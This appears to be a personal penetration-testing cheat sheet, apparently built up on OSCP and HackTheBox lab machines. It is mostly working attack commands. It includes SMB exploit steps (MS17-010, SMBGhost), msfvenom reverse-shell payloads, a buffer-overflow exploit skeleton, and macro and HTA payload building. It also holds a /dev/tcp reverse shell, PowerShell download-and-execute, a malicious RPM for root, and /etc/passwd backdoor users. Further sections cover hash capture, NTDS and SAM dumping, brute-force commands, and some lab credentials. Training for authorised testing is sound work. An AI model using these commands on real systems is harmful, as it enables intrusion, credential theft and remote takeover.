The goal of this repository is to centralize everything that I have learned. This includes knowledge about system administration, pentesting, much more.

Methodology

Reconnaissance

Passive

OSINT

• https://github.com/Josue87/MetaFinder
• https://github.com/khast3x/h8mail
• https://github.com/initstring/cloud_enum
• https://github.com/OWASP/Amass
• https://github.com/aboul3la/Sublist3r
• https://dnsdumpster.com/
• https://github.com/six2dez/reconftw

Active

Windows

SMB

• check null sessions

RID cycling

lookupsid.py guest:@192.168.240.172 -> RID cycling

Exploits

• check wich exploit is available nmap -p 139,445 --script 'smb-vuln*' $IP

Running Windows XP -> MS08-067 vulnerable -> exploit 40279 from exploit-db (oscp alice) https://www.exploit-db.com/exploits/40279

Running Windows 10 (security patch released in March 2020) -> CVE-2020-0796 https://github.com/danigargu/CVE-2020-0796 replace shellcode in exploit.cpp (line 204) msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=8081 -f dll -f csharp

SMBv1 -> ms17-010 https://github.com/3ndG4me/AutoBlue-MS17-010

-→ SMB Remote Code Execution (MS17-010) https://0xdf.gitlab.io/2021/05/11/htb-blue.html https://github.com/worawit/MS17-010 https://github.com/helviojunior/MS17-010

git clone https://github.com/helviojunior/MS17-010; cd MS17-010 msfvenom -p windows/shell_reverse_tcp -f exe EXITFUNC=thread LHOST=$(iptun) LPORT=445 -o rev.exe python2 send_and_execute.py $IP rev.exe

• SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) MS09_050 python2 -m pip install pysmb searchsploit -m 40280.py msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f python

A major pain to do without msfconsole... exploit(windows/smb/ms09_050_smb2_negotiate_func_index)

DNS Poisoning

intercept hashes with Responder -> can also enum with incomming connections sudo python Responder.py -I tun0 --lm

Kerberos

Kerbrute

kerbrute_linux_amd64 userenum -d DANTE.local /opt/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 172.16.1.20 --output recon/kerbrute-usernames

Enumeration

API

• check all http methods on each endpoints

Listening ports

• netstat -ano | findstr /i /c:"listen"
• netstat -tulpn

WMIC path win32_process get Caption,Processid,Commandline

Windows

• list drives wmic logicaldisk get caption,description,providername

• list installed patches wmic qfe list full /format:list

• list installed applications wmic product get name,version wmic product get name,version,installlocation

• list services net start wmic service get DisplayName,name,startname wmic service get DisplayName,name,startname,pathname wmic service get name,displayname,pathname,startmode |findstr /i "auto"

• query config of service sc qc upnphost

• update service binary path sc config upnphost binpath= "C:\Inetpub\Scripts\rv.exe"

• change user running service sc config upnphost obj= ".\LocalSystem" password= ""

cmd.exe /c sc queryex state=all type=service Get-Service | findstr -i "manual" gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "manual"} | select PathName,DisplayName,Name

Exploitation

Linux

Kernel

Kernel exploits

Linux ucal 3.0.0-12 -> mempodipper -> compile locally -> upload

Windows

Binary Exploitation

Buffer Overflow

Stack based

mona.py TL;DR

1. Configure work folder
   • !mona config -set workingfolder c:\mona\%p
2. Generate local array that mona will use to determine bad char
   • !mona bytearray -b "\x00"
3. Compare local array with ESP to identify bad chars
   • !mona compare -f C:\mona\<PATH>\bytearray.bin -a <ESP address>
4. Generate a new local array without the identified bad chars
   • !mona bytearray -b "\x00 + <BAD_CHARS>"
5. Repeat step 2 through 4 until there is no more bad chars
6. Search for a jmp esp instruction in the binay
   • !mona jmp -r esp -cpb "<BAD_CHARS>"
7. Generate shellcode
   • msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f python -v shellcode -b '\x00'
8. Done

Skeleton code sample

from pwn import *

ip = '127.0.0.1'
port = 4444
username = 'username'

def pdecode(data):
    print(data.decode('utf8'))

def getchars():
    all_chars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    all_chars += b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    all_chars += b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    all_chars += b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    all_chars += b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    all_chars += b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    all_chars += b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    all_chars += b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    all_chars += b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    all_chars += b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    all_chars += b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    all_chars += b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    all_chars += b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    all_chars += b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    all_chars += b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    all_chars += b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

    return all_chars


# open connection
s = remote(ip, port)

# receive username prompt
rep = s.recv(1024)
pdecode(rep)
# send username
s.send(f'{username}\n')
# receive password prompt
rep = s.recv(1024)
pdecode(rep)
# bof is in password -> increment until crash -> use the content of EIP to find the size of the offset cyclic_find(hex value)
offset = cyclic_find(hex value) # 1028
# data = cyclic(1100)
# eip = b'AAAA' -> !mona jmp -r esp -cpb "\x00"
eip = p32(0x10476D73)
payload = getchars()
# Generate shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.88.128 LPORT=1234 -b "\x00" -f python
buf =  b""
# [...]

lpayload = len(payload)
lnop = 64
nop_slide = lnop * b'\x90'
# data = cyclic(offset) + eip + payload
data = cyclic(offset) + eip + nop_slide + buf
# data = b'\x90' * offset + eip

s.send(data + b'\n')
rep = s.recv(1024)
pdecode(rep)

# close connection
s.close()

• Liodeus. Buffer Overflow personal cheatsheet. Updated August 11, 2020. Accessed August 21, 2022. https://liodeus.github.io/2020/08/11/bufferOverflow.html

Container

is container privileged? -> mount host filesystem (check PG Practice Sirol)

LFI-RFI

• check iptable rules for outgoing port filtering → /etc/iptables/rules.v4 → /etc/iptables/rules.v6

Windows

• identify usernames -> check if they have an ssh key (c:\users\viewer.ssh\id_rsa)

Client-Side

Macro

• Refer to pg/hepet

• Generate the payload msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=443 -f hta-psh -o evil.hta

VBA has a 255-character limit for literal strings, but this restriction does not apply to strings stored in variables.

python script to split the payload in 255-char lines

#!/usr/bin/env python3
import re

hta_file = 'evil.hta'
payload_pattern = '"(powershell.exe .*?)"'
with open(hta_file, 'r') as f:
    content = f.read()

payload = re.findall(payload_pattern, content)[0]
lpayload = len(payload)
n = 50

for i in range (0, lpayload, n):
    chunk = payload[i:i+n]
    print(f'Str = Str + "{chunk}"')

To assigne macro to the document:

1. Create macro
2. quit macro page
3. in workbook ->
4. Tools -> Customize -> Events -> Open document

https://github.com/Greenwolf/ntlm_theft

• Evil desktop.ini to collect hashes mkdir secrets attrib +s secrets cd secrets echo [.ShellClassInfo] > desktop.ini echo IconResource=\responder.local\poc >> desktop.ini attrib +s +h desktop.ini

RCE

• in doubt, use full path (Windows, Linux)

Post-Exploitation

Privilege Escalation

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

• find files modified in the last 15 minutes find / -xdev -mmin -15 -type f -ls 2>/dev/null

• "" accessed in the last 15 minutes find / -xdev -amin -15 -type f -ls 2>/dev/null

• installed patches wmic qfe list

permissions check /etc/passwd and /etc/shadow if writable echo "root2:$(openssl passwd 'mrcake'):0:0:root:/root:/bin/bash" >> /etc/passwd

find / -xdev -type f -writable 2>/dev/null

SUID

• cp # https://gtfobins.github.io/gtfobins/cp/ LFILE=/etc/passwd echo "pwn:$(openssl passwd 'mrcake'):0:0:root:/root:/bin/bash" | cp /dev/stdin "$LFILE"

Unquoted Service Path

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation

• wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\" |findstr /i /v """

unquoted service path

C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe

it will try to run:

• C:\Program.exe
• C:\Program Files\Foxit.exe
• C:\Program Files\Foxit Software\Foxit.exe
• C:\Program Files\Foxit Software\Foxit Reader\Foxit.exe
• C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe

• windows-exploit-suggester
• sherlock
• winpeas*.exe (has more information than .bat version)
• windows-exploit-suggester-new-generation (wesng) https://github.com/bitsadmin/wesng
• check architecture (386, x64) -> 32 bits binaries are in certain path and 64 bits somewhere else # https://ss64.com/nt/syntax-64bit.html

do not forget to prefix .\ to run binaries

--- windows 2k3 seimpersonate -> https://github.com/egre55/windows-kernel-exploits https://github.com/Re4son/Churrasco

--- windows 10 -> smbghost https://github.com/danigargu/CVE-2020-0796 replace shellcode in exploit.cpp (line 204) msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=8081 -f dll -f csharp

--- windows 10 + windows server 2016 + windows server 2019 https://github.com/itm4n/PrintSpoofer

--- serestoreprivilege Run EnableSeRestorePrivilege.ps1 to enable this privilege to our PowerShell session. We now have write access to C:\Windows\System32 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md https://github.com/xct/SeRestoreAbuse

--- sebackupprivilege echo 'set verbose onX' > script.txt echo 'set metadata C:\Windows\Temp\meta.cabX' >> script.txt echo 'set context clientaccessibleX' >> script.txt echo 'set context persistentX' >> script.txt echo 'begin backupX' >> script.txt echo 'add volume C: alias cdriveX' >> script.txt echo 'createX' >> script.txt echo 'expose %cdrive% E:X' >> script.txt echo 'end backupX' >> script.txt

diskshadow /s script.txt

dir e:

robocopy /b e:\windows\ntds . ntds.dit

--- requires cmd interactive shell ntdsutil activate instance ntds ifm create full c:\ntdsutil quit quit

wbadmin start backup -backuptarget:\$(iptun)\tools -include:c:\windows\ntds

--- sebackupprivilege reg save hklm\sam sam.reg reg save hklm\system system.reg

pypykatz registry --sam sam.reg system.reg

--- sebackupprivilege NTDS.dit https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Copy-VSS.ps1 import-module .\Copy-VSS.ps1 Copy-VSS.ps1

--- Privileges -> Attack https://github.com/gtworek/Priv2Admin

--- always install elevated

Set the right arch!

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=80 --encoder x64/xor --iterations 9 --format msi --out AlwaysInstallElevated.msi msiexec /quiet /qn /i c:\users\shenzi\alwe.msi

Exfiltration

• https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration

PowerShell

• PS Drive New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"

Infiltration

• https://blog.ropnop.com/transferring-files-from-kali-to-windows
• https://sushant747.gitbooks.io/total-oscp-guide/transfering_files_to_windows.html

Password

1. /opt/SecLists/Passwords/probable-v2-top12000.txt:2037
2. /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt
3. /opt/SecLists/Passwords/xato-net-10-million-passwords.txt
4. /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

try to login with: • appname:appname • webservice:webservice • username:username

• try password combination using the software name (jenkins:jenkins, nexus:nexus, webmail:webmail)
• try known passwords for protected archives or documents

Restricted Shell

• https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
• https://0xffsec.com/handbook/shells/restricted-shells/
• https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

lshell

• https://www.aldeid.com/wiki/Lshell

• echo os.system('/bin/bash')
• vim
  • :set shell=/bin/bash
  • :shell

rbash

https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/

Get list of commands compgen -c

export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:$PATH

rshell

find / -name test -exec /bin/bash ;

Reverse Shell

• Should outgoing ports be filtered, try ports that are in use by the machine For exemple: Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 21:01 EDT Nmap scan report for 192.168.54.64 Host is up (0.049s latency). Not shown: 65529 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3306/tcp open mysql 8003/tcp open mcreport

use port 21,22,139,445,3306,8003

Active Directory

• PowerView to abuse AD

• 2021 DA takeover with domain account https://github.com/Ridter/noPac

Tools

Linux

autorecon

• project repository

Examples:

autorecon $TARGET --global.domain $TARGET_DOMAIN.TLD --single-target

bloodhound.py

bloodhound-python -u "$TARGET_USER" -p "$TARGET_PASSWORD" --dns-tcp -d "$TARGET_DOMAIN.TLD" -c all -dc "$TARGET_DOMAIN_FQDN" -ns "$DNS_IP"

bloodhound-python -u anirudh -p 'SecureHM' -c ALL -d vault.offsec -dc dc.vault.offsec -ns $IP

cadaver

cadaver <ip address>

certbox

certbot certonly --webroot --preferred-challenges http -d <domain_fqdn> --webroot-path <webroot_path> --agree-tos -m <contact_email_address>

cewl

• Fetch a list of all pages with content (either manually or with feroxbuster) Save all words with lenght >= 5 chars -> run bruteforce with hydra

for url in $(cat urls.txt); do echo $url && cewl -d 5 $url >> temp_cewl.txt;done
cat temp_cewl.txt | sort -u >> cewl.txt && rm temp_cewl.txt

cewl --depth 5 --min_word_length 5 --with-numbers --write cewl.log

chisel

• To forward port from remote host to localhost kali

• On kali chisel_linux sever --port 4434 --reverse ./chisel_1.7.7_linux_amd64 server --port 4434 --reverse

• on remote host chisel_windows client <kali ip>:<kali port> R<kali host ip>:<kali host port>:<remote host ip>:<remote host port> chisel_windows client 192.168.88.128 R10.10.14.210:4444:127.0.0.1:4444

mingw

sudo apt install mingw-w64

i686-w64-mingw32-gcc main.c -o main.exe

• If winsock.h is required, link ws2_32 -> -lws2_32 i686-w64-mingw32-gcc main.c -o main.exe -lws2_32

crackmapexec

CrackMapExec

• https://www.infosecmatter.com/crackmapexec-module-library/

• Bruteforce with list of users and list of password cme smb 172.16.1.13 -u users -p passwords --shares

• Check null session cme smb 192.168.240.152 -u ' ' -p '' --shares

crackmapexec smb vault.offsec -u 'guest' -p '' crackmapexec smb vault.offsec -u 'guest' -p '' --shares crackmapexec smb vault.offsec -u 'guest' -p '' --rid-brute

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#automate-the-sysvol-and-passwords-research
• check for credentials in sysvol cme smb ip -u 'user' -p "password" -M gpp_autologin

enum4linux

evil-winrm

• https://linuxcommandlibrary.com/man/evil-winrm

evil-winrm -i 172.16.2.5 -u 'jbercov' -p 'myspace7'

• make powershell script directory available evil-winrm -i 172.16.2.5 -u 'jbercov' -p 'myspace7' -s /opt/powershell_scripts

feroxbuster

feroxbuster -ekr --wordlist /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://10.10.110.100:65000 -o recon/ferox

feroxbuster -B # to look for .swp files

gobuster

• prepend command with HTTP_PROXY="socks5://127.0.0.1:1337" gobuster...

HTTP_PROXY="socks5://127.0.0.1:1337" gobuster dir -u http://172.16.1.13:80 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x html,php,txt,zip,bak | tee recon/port80-raft-words-phphtmltxtzipbak

• custom useragent -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36'

hydra

https://github.com/gnebbia/hydra_notes/blob/master/README.md

To check requests with proxy: export HYDRA_PROXY=connect://127.0.0.1:8080

• Wordpress bruteform on port 65000 with known username hydra 10.10.110.100 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:is incorrect." -l james -P /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -s 65000 watchout for empty lines in wordlist -> rockyou.txt

• SSH bruteforce with 4 thread hydra -l james 10.10.110.100 -P /opt/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ssh -t 4

• FTP hydra -V -L users -P pass ftp://172.16.1.12 hydra -C /opt/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://$IP

• jenkins proxychains4 -q hydra -V -s 8080 172.16.1.19 http-form-post “/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password” -L user.txt -P pass -t 10 -w 30

• mssql hydra -l 'sophie' -P ''TerrorInflictPurpleDirt996655" mssql://172.16.1.5 -V

• drupal user enumeration hydra 10.129.214.154 http-post-form "/user/password:name=^USER^&form_build_id=form-q2OtblVzGPwpntpRLcpH0irZhuK72SVAinIVwJjNAWU&form_id=user_pass&op=E-mail+new+password:is not recognized" -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -e 'n'

iconv

• Convert script to windows encoding (oscp sv-file01) cat script.ps1 | iconv --to-code UTF-16LE | base64 -w 0

ident-user-enum

https://book.hacktricks.xyz/network-services-pentesting/113-pentesting-ident?q=113

ident-user-enum $IP 22 113 5432 8080 10000

impacket

getaduser

• With creds, pull all the users (oscp sv-file01) GetADUsers.py -all -dc-ip 10.11.1.20 '/'

getnpnusers

https://cheatsheet.haax.fr/windows-systems/exploitation/kerberos/

• User -no-pass if account has UF_DONT_REQUIRE_PREAUTH GetNPUsers.py 'dante.admin/jbercov' -no-pass -dc-ip 172.16.2.5

GetNPUsers.py spookysec.local/ -usersfile valid_usernames.txt -dc-ip $IP -no-pass -format hashcat -outputfile asreproastable.log

hashcat -m 18200 aseroastable.log passwordlist.txt

getuserspns

lookupsid

• requires valid user

lookupsid.py guest:@dc

secretsdump

secretsdump.py -sam sam -security security -system system LOCAL

john

• https://www.kali.org/tools/john/

• unshadowed # https://erev0s.com/blog/cracking-etcshadow-john/ unshadow passwd shadow > unshadow john --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt unshadowed

crack rar archives

rar2john backup.rar > backup.rar.hash john backup.rar.hash --format=RAR5 --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

kerbrute

• Configure DC and domain in /etc/hosts 192.168.146.122 hutchdc.hutch.offsec hutchdc hutch.offsec

• user enum kerbrute_linux_amd64 userenum --dc hutchdc -d hutch.offsec /opt/SecLists/Usernames/top-usernames-shortlist.txt

ldapsearch

ldapsearch -x -H ldap://$IP:389 -D '' -w '' -b "DC=hutch,DC=offsec"

metasploit

• run msf with proxychains -> prefix msfconsole with proxychain command

proxychains4 -q msfconsole

msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=1234 EXITFUNC=thread -b "\x00" -f python -v

msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f exe > IObit.exe

• htb grandpa msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f raw -e x86/alpha_mixed

• linux msfvenom -p linux/x86/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f elf > rv

• linux bash msfvenom -p cmd/unix/reverse_bash LHOST=$(iptun) LPORT=2222 -f raw > shell.sh

• linux x86 shared object msfvenom -p linux/x86/shell_reverse_tcp LHOST=$(iptun) LPORT=23 EXITFUNC=thread -f elf-so > rv.so

• windows x64 msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=445 -f exe > rv.exe

nmap

• Interactive nse script lookup https://www.infosecmatter.com/nmap-nse-library/

• Get tops N UDP ports -- for udp scan behind proxy sort -r -k3 /usr/share/nmap/nmap-services
  | grep '/udp'
  | head -n 100
  | cut -f 2
  | cut -d'/' -f 1
  | xargs -I{} echo -n "{},"

openssl

openssl passwd 'password' openssl rand -hex 32

proxychains

pypykatz

• dump lsass via procdump

pypykatz lsa minidump lsass.dmp

• extract hashes from sam/system registry hives pypykatz registry --sam sam.reg system.reg

python

• Generate NTLM hash import hashlib,binascii hash = hashlib.new('md4', "shantewhite".encode('utf-16le')).digest() print binascii.hexlify(hash)

responder

sudo python Responder.py -I tun0

Evil desktop.ini to collect hashes

mkdir secrets attrib +s secrets cd secrets echo [.ShellClassInfo] > desktop.ini echo IconResource=\responder.local\poc >> desktop.ini attrib +s +h desktop.ini

pcredz

https://github.com/lgandx/PCredz

sed

• remove empty lines from stdin

sed ‘/^$/d’

• insert text at nth line sed -i '8i system("sh -i >& /dev/tcp/10.10.14.10/443 0>&1")'

• delete nth line sed -i '8d'

sendmail

sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s $IP:25 -u 'Your spreadsheet' -m 'Here is your requested spreadsheet' -a test.ods

smbclient

• list shares smbclient -L '//192.168.240.152'

• list shares with null session smbclient -L '//192.168.240.152' -U ' ' -p ''

• Download all files from share recursively without prompt smbclient //10.11.1.31/wwwroot smb: > prompt smb: > mask "" smb: > recurse ON smb: > mget *

smbclient //$IP/backup -U 'spookysec.local/svc-admin' --password management2005

smbmap

• smbshare enum recursive with null session smbmap -H 192.168.240.152 -u ' ' -p '' -R

sqlmap

• Get mysql system user:password sudo proxychains -q sqlmap -r req.txt -p id --dbms mysql -D mysql -T user -C User -C Password --dump

ssh

https://github.com/opsdisk/the_cyber_plumbers_handbook/blob/master/cph_version_1.4_20210829.pdf

wfuzz

• look for ssrf wfuzz -z range,0-10000 -u http://dc01.heist.offsec:8080/?url=http://localhost:FUZZ --field url --hh 178435

dirbuster wfuzz -z file,/opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -u http://$IP:10000/FUZZ --hh 12

fuzz json api + proxy wfuzz -p localhost:8080:HTTP -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt -H 'Content-Type: application/json' -d '{"user":"FUZZ","url":"http://192.168.49.113"}' -u http://$IP:13337/update

windows-exploit-suggester

wes systeminfo.txt --exploits-only --impact "elevation of privilege"

• requires sudo apt install python-pip # python2 pip python2 -m pip install xlrd==1.2.0 # https://github.com/AonCyberLabs/Windows-Exploit-Suggester/issues/50

https://github.com/Riqky/Windows-Exploit-Suggester

• needs a fix for io.StringIO
• needs a try except IndexError

• /opt/Windows-Exploit-Suggester/

python3 windows-exploit-suggester.py --update python3 windows-exploit-suggester.py -i /host/htb/granny/systeminfo.txt --database 2022-06-04-mssb.xls

python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py -i systeminfo.txt -d /opt/Windows-Exploit-Suggester/2022-06-04-mssb.xlsx

wes.py

1. wes --update
2. wes systeminfo.txt --impact 'Elevation of Privilege' -s critical
   1. wes systeminfo.txt --exploits-only

--- impacts • Impact: Denial of Service • Impact: Elevation of Privilege • Impact: Information Disclosure • Impact: Remote Code Execution • Impact: Security Feature Bypass • Impact: Spoofing

--- severities • Severity: Critical • Severity: Important

wpscan

wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://10.10.110.100:65000/wordpress | tee enum/wordpress-full-scan

wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://$IP | tee enum/wordpress-full-scan

curl -X POST --data 'system.listMethods' http://10.10.110.100:65000/wordpress/xmlrpc.php

xfreerdp

xfreerdp /v:192.168.113.119 /u:victor /p:WormAloeVat7 /dynamic-resolution

yum

• https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2

• https://gtfobins.github.io/gtfobins/yum/

• create malicious rpm package git clone https://github.com/jordansissel/fpm cd fpm && sudo gem install fpm sudo apt install -y rpm # rpmbuild dependency

• Create payload with msfvenom msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.4.66 LPORT=1337 -e x86/shikata_ga_nai -a x86 -f elf -o root_reverse_shell

• package the payload in an rpm file fpm -n root -s dir -t rpm -a all --before-install $PAYLOAD $DESTINATION

• setup a listener ncat -lnvp $LPORT

• installation of our malicious package sudo yum --disablerepo=* localinstall -y root-1.0-1.noarch.rpm

• or sudo dnf install --disablerepo=* -y root-1.0-1.noarch.rpm

tmux

• Shared tmux session tmux new-session -s tmux attach-session -t

• Shared tmux session with another user tmux -S /tmp/ new -s # Create session chgrp /tmp/ # change group of socket (other user needs that group) tmux -S /tmp/ attach -t # from the other user, attach to the session using the socket

coercer

sudo python Responder.py -I ens33 --lm -A --disable-ess

Coercer -u 'usernamer' -p 'password' -d 'domain' --listener --target

Windows

certutil

• https://blog.ropnop.com/transferring-files-from-kali-to-windows

certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip

certutil.exe -urlcache -split -f http://192.168.49.146/rv.exe c:\windows\temp\rv.exe

cmd

• c:\windows\system32\cmd.exe
• C:\Windows\sysWOW64\cmd.exe
• C:\Windows\sysNative\cmd.exe

https://ss64.com/nt/syntax-64bit.html

curl vbs

echo 'Set colNamedArguments = WScript.Arguments.Named' > curl.vbs
echo 'url = colNamedArguments.Item("url")' >> curl.vbs
echo 'data = ""' >> curl.vbs
echo 'ContentType = "application/x-www-form-urlencoded"' >> curl.vbs
echo 'If colNamedArguments.Exists("method") Then' >> curl.vbs
echo '  method = colNamedArguments.Item("method")' >> curl.vbs
echo 'Else' >> curl.vbs
echo '  method = "GET"' >> curl.vbs
echo 'End If' >> curl.vbs
echo 'If colNamedArguments.Exists("json") Then' >> curl.vbs
echo '    ContentType = "application/json"' >> curl.vbs
echo 'End If' >> curl.vbs
echo 'If colNamedArguments.Exists("dataFile") Then' >> curl.vbs
echo '  Set objFS = CreateObject("Scripting.FileSystemObject")' >> curl.vbs
echo '  dataFile = colNamedArguments.Item("dataFile")' >> curl.vbs
echo '  Set dataFileHandle = objFS.OpenTextFile(dataFile)' >> curl.vbs
echo '  Do Until dataFileHandle.AtEndOfStream' >> curl.vbs
echo '    data = data & dataFileHandle.ReadLine' >> curl.vbs
echo '  Loop' >> curl.vbs
echo '  dataFileHandle.Close' >> curl.vbs
echo 'End If' >> curl.vbs
echo 'dim xmlhttp: Set xmlhttp = CreateObject("MSXML2.ServerXMLHTTP")' >> curl.vbs
echo 'xmlhttp.Open method, url, False' >> curl.vbs
echo 'xmlhttp.setRequestHeader "Content-Type", ContentType' >> curl.vbs
echo 'xmlhttp.send data' >> curl.vbs
echo 'WScript.Echo xmlhttp.responseText' >> curl.vbs
echo 'Set xmlhttp = Nothing' >> curl.vbs

• Usage ' GET request cscript \\samba\share\scripts\curl.vbs /url:http://example.com/

' POST request with URL encoded POST data in a file cscript \\samba\share\scripts\curl.vbs /url:http://example.com/ /dataFile:urlEncodedData.txt /method:POST

' POST request with JSON POST data in a file cscript \\samba\share\scripts\curl.vbs /url:http://example.com/ /dataFile:jsonData.txt /method:PATCH /json

• https://gist.github.com/cabloo/387f1d6d8fe81752574d

net

• https://en.wikiversity.org/wiki/Net_(command)/Localgroup

• mount share as letter with username:bobby <password: bobby> # /USER is case sensitive net use g: \\10.10.14.235\tools /USER:bobby bobby

• list all services net start

• create user net user username password /all

• add user to local admin group net localgroup Administrators ariah /add

netsh

• show outgoing firewall rules netsh advfirewall firewall show rule name=all dir=out

powershell

• ping scan 1..254 | ForEach-Object {Get-WmiObject Win32_PingStatus -Filter "Address='172.16.2.$_' and Timeout=200 and ResolveAddressNames='true' and StatusCode=0" | select ProtocolAddress*}

• port scan 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("IP ADR",$_)) "Port $_ is open!"} 2>$null

• powershell PSDrive (network share) New-PSDrive M FileSystem \\192.168.119.235\T

powershell -nop -noninter -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.235/winpeas.bat')" powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadFile('http://192.168.119.235/winPEAS.bat','winpeas.bat')"

• runas

$username = 'alice'
$password = 'aliceishere'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process nc.exe -ArgumentList "-e cmd.exe 192.168.119.235 444" -Credential $credential

OR

powershell Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential 'username', (ConvertTo-SecureString 'password' -AsPlainText -Force))

• Web client (curl like) (New-Object System.Net.WebClient).DownloadString("http://localhost/")

• Unzip Expand-Archive -Force C:\path\to\archive.zip C:\where\to\extract\to

procdump

